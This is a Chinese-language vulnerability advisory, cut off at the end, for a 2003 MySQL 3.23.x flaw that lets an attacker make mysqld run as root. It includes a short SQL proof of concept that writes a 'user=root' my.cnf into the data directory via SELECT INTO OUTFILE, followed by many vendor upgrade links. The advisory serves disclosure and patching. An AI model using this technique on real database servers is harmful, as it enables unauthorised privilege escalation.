MySQL mysqld提升权限漏洞发布时间:2003-03-08 更新时间:2003-03-24 严重程度:高 威胁程度:权限提升 错误类型:配置错误 利用方式:客户机模式 BUGTRAQ ID:7052 CVE(CAN) ID:CAN-2003-0150 受影响系统 MySQL AB MySQL 3.23.36详细描述 MySQL存在一个漏洞,mysqld服务可能被提供权限。 攻击者可以利用这个漏洞在MySQL的数据目录创建my.cnf文件,并且在'[mysqld]'选项段中包含'user=root'项,那么MySQL重新启动的时候就导致mysqld服务是以root身份运行。 测试代码 mysql>CREATE DATABASE roottext; mysql>USE roottext; mysql>CREATE TABLE hack (conf VARCHAR(80)); mysql>INSERT IN hack VALUES ('[mysqld]'); mysql>INSERT IN hack VALUES ('user=root'); mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack mysql>QUIT 解决方案 MySQL AB MySQL 3.23.36: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html EnGarde Secure Linux Upgrade MySQL-3.23.56-1.0.23.i386.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/i386/MySQL- 3.23.56-1.0.23.i386.rpm EnGarde Secure Linux Upgrade MySQL-client-3.23.56-1.0.23.i386.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/i386/MySQL- client-3.23.56-1.0.23.i386.rpm EnGarde Secure Linux Upgrade MySQL-shared-3.23.56-1.0.23.i386.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/i386/MySQL- shared-3.23.56-1.0.23.i386.rpm EnGarde Secure Linux Upgrade MySQL-3.23.56-1.0.23.i686.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/i686/MySQL- 3.23.56-1.0.23.i686.rpm EnGarde Secure Linux Upgrade MySQL-client-3.23.56-1.0.23.i686.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/i686/MySQL- client-3.23.56-1.0.23.i686.rpm EnGarde Secure Linux Upgrade MySQL-shared-3.23.56-1.0.23.i686.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/i686/MySQL- shared-3.23.56-1.0.23.i686.rpm MySQL AB MySQL 3.23.37: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.38: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.39: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.40: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.41: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.42: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.43: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.44: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.45: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.46: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.47: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.48: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.49: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.50: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.51: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.52: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.53 a: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.53: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.54 a: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.54: MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html MySQL AB MySQL 3.23.55: Trustix Upgrade mysql-3.23.56-1tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/mysql-3.23.56-1tr.i586.rpm Trustix Upgrade mysql-bench-3.23.56-1tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/mysql-bench-3.23.56-1tr.i586.rpm Trustix Upgrade mysql-devel-3.23.56-1tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/mysql-devel-3.23.56-1tr.i586.rpm Trustix Upgrade mysql-shared-3.23.56-1tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/mysql-shared-3.23.56-1tr.i586.rpm MySQL AB Upgrade MySQL 3.23.56 http://www.mysql.com/downloads/mysql-3.23.html Trustix Upgrade mysql-client-3.23.56-1tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/mysql-client-3.23.56-1tr.i586.rpm 相关信息 报告:bugsman@libero.it 相关信息:http://online.securityfocus.com/advisories/5120 http://online.securityfocus.com/advisories/5159 http://online.securityfocus.com/advisories/5114 http://online.securityfocus.com/advisori |
